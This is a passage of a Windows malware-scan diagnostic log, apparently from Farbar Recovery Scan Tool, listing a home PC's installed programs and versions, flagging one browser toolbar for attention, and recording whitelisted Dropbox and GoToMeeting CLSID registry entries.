GDR 3128 for SQL Server 2012 (KB2793634) (64-bit) (HKLM\...\KB2793634) (Version: 11.1.3128.0 - Microsoft Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.93 - Google Inc.)
Google Drive (HKLM-x32\...\{12ADFB82-D5A3-43E4-B2F4-FCD9B690315B}) (Version: 1.24.9931.5480 - Google, Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.6710.2136 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
GoToMeeting 7.1.8.2553 (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\GoToMeeting) (Version: 7.1.8.2553 - CitrixOnline)
GoToMeeting 7.1.8.2553 (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\GoToMeeting) (Version: 7.1.8.2553 - CitrixOnline)
Grim Tales: The Bride (remove only) (HKLM-x32\...\Grim Tales: The Bride) (Version: - )
Halloween: Trick or Treat (x32 Version: 3.0.2.32 - WildTangent) Hidden
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.4.12850.3526 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP MAINSTREAM KEYBOARD (HKLM-x32\...\{B40D7926-AE5F-41EA-8AC6-56C0E2F00E9D}) (Version: 1.4.3.0 - Hewlett-Packard)
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 4.1.4229 - Hewlett-Packard)
HP MediaSmart Music (HKLM-x32\...\InstallShield_{91A34181-9FAD-43AB-A35F-E7A8945B7E1C}) (Version: 4.1.4301 - Hewlett-Packard)
HP MediaSmart Photo (HKLM-x32\...\InstallShield_{6DAF8CDC-9B04-413B-A0F2-BCC13CF8A5BF}) (Version: 4.1.4211 - Hewlett-Packard)
HP MediaSmart SmartMenu (HKLM\...\{5B08AF35-B699-4A44-BB89-3E51E70611E8}) (Version: 3.1.1.12 - Hewlett-Packard)
HP MediaSmart Video (HKLM-x32\...\InstallShield_{D12E3E7F-1B13-4933-A915-16C7DD37A095}) (Version: 4.1.4214 - Hewlett-Packard)
HP MediaSmart/TouchSmart Netflix (HKLM-x32\...\{BDDA1E1E-204E-4368-B0C2-737F16B76307}) (Version: 1.0.3.0 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Officejet 6700 Basic Device Software (HKLM\...\{C0CA6788-386E-4BE1-B214-629E746A5302}) (Version: 25.0.619.0 - Hewlett-Packard Co.)
HP Officejet 6700 Help (HKLM-x32\...\{50DA41E2-0701-43E2-A8BB-FAA0CB64B28B}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet 6700 Product Improvement Study (HKLM\...\{0AACE096-CF1C-4FCE-BB60-6F3F914006C9}) (Version: 25.0.619.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.11352 - HP Photo Creations Powered by RocketLife)
HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP)
HP Setup (HKLM-x32\...\{72D90DB3-A16A-4545-B555-868471101833}) (Version: 8.1.4186.3400 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Update (HKLM-x32\...\{97486FBE-A3FC-4783-8D55-EA37E9D171CC}) (Version: 5.005.000.002 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.1.2.27173 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
Hulu Desktop (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\HuluDesktop) (Version: 0.9.13 - Hulu LLC)
Hulu Desktop (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\HuluDesktop) (Version: 0.9.13 - Hulu LLC)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
iCloud (HKLM\...\{709A2D23-C25E-47B5-9268-CB6FEE648504}) (Version: 4.1.1.53 - Apple Inc.)
Intel Driver Update Utility (HKLM-x32\...\{ca4bc3a8-b99c-4416-90d8-351a8ceab458}) (Version: 2.2.0.2 - Intel)
Intel(R) Driver Update Utility 2.2 (x32 Version: 2.2.0.1 - Intel) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.5.0.1026 - Intel Corporation)
Internet Explorer (Enable DEP) (HKLM\...\{a9264802-8a7a-40fe-a135-5c6d204aed7a}.sdb) (Version: - )
iTunes (HKLM\...\{BFEAB774-C7DC-4032-B05A-DA5F7CB7B365}) (Version: 12.2.2.25 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java(TM) 6 Update 22 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216022F0}) (Version: 6.0.220 - Oracle)
Java(TM) 6 Update 29 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216023FF}) (Version: 6.0.290 - Oracle)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Jewel Quest 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
K-Lite Codec Pack 8.7.0 (Standard) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 8.7.0 - )
Kobo (HKLM-x32\...\Kobo) (Version: - )
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2823 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2823 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{46BA053F-57B3-4153-BDB6-D37EEC8B12D7}) (Version: 1.18.15.1 - LightScribe)
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Margrave - The Curse of the Severed Heart (HKLM-x32\...\am-margravethecurseoftheseveredheart) (Version: - )
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft IntelliPoint 8.0 (HKLM\...\{563F041C-DFDB-437B-A1E8-E141E0906076}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office FrontPage 2003 (HKLM-x32\...\{91170409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Visio Professional 2003 (HKLM-x32\...\{91510409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Report Viewer 2012 Runtime (HKLM-x32\...\{9CCE40CE-A9E6-4916-8729-B008558EEF3F}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{83F2B8F4-5CF3-4BE9-9772-9543EAE4AC5F}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version: - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client (HKLM\...\{D411E9C9-CE62-4DBF-9D92-4CB22B750ED5}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Policies (HKLM-x32\...\{DC487E40-046E-42A9-9C7C-5D2B1A7EB211}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{8CB0713F-CFE0-445D-BCB2-538465860E1A}) (Version: 11.1.3128.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL Compiler Service (HKLM\...\{88CB5DFD-6CE1-486F-998C-9FC090FCE5E2}) (Version: 11.1.3128.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{54C5041B-0E91-4E92-8417-AAA12493C790}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{C3F6F200-6D7B-4879-B9EE-700C0CE1FCDA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{F1949145-EB64-4DE7-9D81-E6D27937146C}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - ENU (HKLM-x32\...\{D64B6984-242F-32BC-B008-752806E5FC44}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MixiDJ V33 Toolbar (HKLM-x32\...\MixiDJ_V33 Toolbar) (Version: 6.13.3.1 - MixiDJ V33) <==== ATTENTION
MONOPOLY (HKLM-x32\...\am-monopoly) (Version: - )
MONOPOLY (HKLM-x32\...\MONOPOLY) (Version: 1.1.1.0 - Pogo.com)
Monopoly City (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-118892567}) (Version: - Oberon Media)
Movie Theme Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 4.1.4030 - Hewlett-Packard)
Movie Theme Pack for HP MediaSmart Video (x32 Version: 4.1.4030 - Hewlett-Packard) Hidden
Mozilla Firefox 40.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 en-US)) (Version: 40.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Music Oasis (HKLM-x32\...\{c6c214df-2922-4809-94aa-f4d67d4451ec}) (Version: 1.0.0 - W3i, LLC)
Norton Internet Security (HKLM-x32\...\NIS) (Version: 22.5.2.15 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
OpenOffice.org 3.3 (HKLM-x32\...\{3E171899-0175-47CC-84C4-562ACDD4C021}) (Version: 3.3.9567 - OpenOffice.org)
Origin (HKLM-x32\...\Origin) (Version: 9.4.7.2799 - Electronic Arts, Inc.)
ParetoLogic FileCure (HKLM-x32\...\{C1C441C4-57FA-4950-BDBA-BABFBAA2AA39}) (Version: 1.1.2.0 - ParetoLogic, Inc.)
PDF Complete Special Edition (HKLM-x32\...\PDF Complete) (Version: 3.5.111 - PDF Complete, Inc)
PDF Reader (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\PDF Reader) (Version: - )
PDF Reader (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\PDF Reader) (Version: - )
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
Philips SPC230NC Webcam (HKLM-x32\...\{52480FEE-7C32-47B7-95BF-D24374FBB54C}) (Version: 1.0.0.0 - Philips)
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
PhotoNow! (x32 Version: 1.1.6904 - CyberLink Corp.) Hidden
PictureMover (HKLM-x32\...\{264FE20A-757B-492a-B0C3-4009E2997D8A}) (Version: 3.5.0.28 - Hewlett-Packard Company)
Plants vs. Zombies (x32 Version: 2.2.0.95 - WildTangent) Hidden
Playalot Games (HKLM-x32\...\{3A3532ED-A121-4297-AA4F-70B60E4BD631}) (Version: 1.0.0 - W3i, LLC)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4022 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4022 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.2906 - CyberLink Corp.)
PowerDirector (x32 Version: 8.0.2906 - CyberLink Corp.) Hidden
PressReader (HKLM-x32\...\{912CED74-88D3-4C5B-ACB0-13231864975D}) (Version: 5.10.621.0 - NewspaperDirect Inc.)
QuickTime 7 (HKLM-x32\...\{627FFC10-CE0A-497F-BA2B-208CAC638010}) (Version: 7.77.80.95 - Apple Inc.)
Ralink 802.11n Wireless LAN Card (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 3.2.13.0 - Ralink)
Raptr (HKLM-x32\...\Raptr) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Reason Core Security (HKLM-x32\...\Reason Core Security) (Version: 1.1.0.0 - Reason Software Company Inc.)
Recovery Manager (x32 Version: 5.5.2926 - CyberLink Corp.) Hidden
Safari (HKLM-x32\...\{FA4C2D53-205F-4245-9717-F3761154824D}) (Version: 5.34.57.2 - Apple Inc.)
Service Pack 1 for SQL Server 2012 (KB2674319) (64-bit) (HKLM\...\KB2674319) (Version: 11.1.3000.0 - Microsoft Corporation)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Sid Meier's Civilization 4 Complete (HKLM-x32\...\{30D1F3D2-54CF-481D-A005-F94B0E98FEEC}) (Version: 1.74 - Firaxis Games)
Sid Meier's Civilization IV Colonization (HKLM-x32\...\{EF36A836-BF89-4A4F-B079-057B0C68C1E0}) (Version: 1.00 - Firaxis Games)
Sid Meier's Civilization V (HKLM-x32\...\Civilization V) (Version: - 2K Games, Inc.)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
SketchUp 2015 (HKLM\...\{350488A4-1540-4103-8F01-B27503891EB0}) (Version: 15.3.331 - Trimble Navigation Limited)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.4.0.9058 - Microsoft Corporation)
Skype™ 7.6 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.6.105 - Skype Technologies S.A.)
Spinco Download Manager (HKLM-x32\...\{704C2901-0E9C-4E4B-862B-2001DACA314B}) (Version: 1.0.0 - Spinco)
Spotify (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Spotify) (Version: 0.8.2.610.g090a06f8 - Spotify AB)
Spotify (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Spotify) (Version: 0.8.2.610.g090a06f8 - Spotify AB)
SQL Server 2012 Client Tools (Version: 11.1.3000.0 - Microsoft Corporation) Hidden
SQL Server 2012 Common Files (Version: 11.1.3000.0 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (Version: 11.1.3000.0 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
The Price is Right 2010 Edition(TM) (HKLM-x32\...\am-thepriceisright2010editiontm) (Version: - )
Tom Clancy's EndWar (HKLM-x32\...\{7C3D8108-8D99-427F-A1C2-D8E0D25A469C}) (Version: 1.00.0000 - Ubisoft)
Trainz: Engineer's Edition (HKLM-x32\...\AuranTS2009_is1) (Version: - Auran)
Unit Layers (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Unit Layers) (Version: 9.0 - Unit Layers)
Unit Layers (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Unit Layers) (Version: 9.0 - Unit Layers)
Unity Web Player (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
uPlayer (HKLM-x32\...\{06810DC6-3501-40FE-BCB3-1A7BE6398A36}) (Version: 1.0.0 - Full Spectrum Interactive)
Verizon High Speed Internet (HKLM-x32\...\Verizon High Speed Internet_is1) (Version: - Verizon)
Virtual Families (x32 Version: 2.2.0.95 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.95 - WildTangent) Hidden
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
Vz In Home Agent (HKLM-x32\...\{68C063CF-FF7D-49F3-AE93-ED0DA0EAE214}) (Version: 7.06.04 - Verizon)
WeatherBug® (HKLM-x32\...\WeatherBug®) (Version: 10.0.7.4 - Earth Networks, Inc.)
Web Games Player Plugin (HKLM-x32\...\Web Games Player Plugin) (Version: - Zylom Games)
WestwoodChat (HKLM-x32\...\{7CAE6A67-AF7B-4A6A-8705-8AFACA45BB60}) (Version: 1.0.0.0 - WestwoodChat)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: 1.0.0.0 - WestwoodOnline)
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.11.9 - WildTangent) Hidden
WildTangent Games App for HP (x32 Version: 4.0.11.9 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Wizard101 (HKLM-x32\...\{A9E27FF5-6294-46A8-B8FD-77B1DECA3021}) (Version: 1.0.0 - KingsIsle Entertainment, Inc.)
Women’s Murder Club Twice in a Blue Moon (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-117579150}) (Version: - Oberon Media)
Yahoo! Axis (HKLM-x32\...\Yahoo! NanoClient) (Version: - Yahoo!)
Yahoo! BrowserPlus 2.9.8 (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Yahoo! BrowserPlus) (Version: - Yahoo! Inc.)
Yahoo! BrowserPlus 2.9.8 (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Yahoo! BrowserPlus) (Version: - Yahoo! Inc.)
Yahoo! Software Update (HKLM-x32\...\Yahoo! Software Update) (Version: - )
Zinio Reader 4 (HKLM-x32\...\ZinioReader4.9310D8F796442B71068C511E15D70529A702D19D.1) (Version: 4.0.2811 - Zinio LLC)
Zinio Reader 4 (x32 Version: 4.0.2811 - Zinio LLC) Hidden
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Ken Terry\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{CC99A798-FD3D-4AB4-969E-6071612524F9}\InprocServer32 -> C:\PROGRA~2\APPGRA~1\APPGRA~2.DLL No File
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
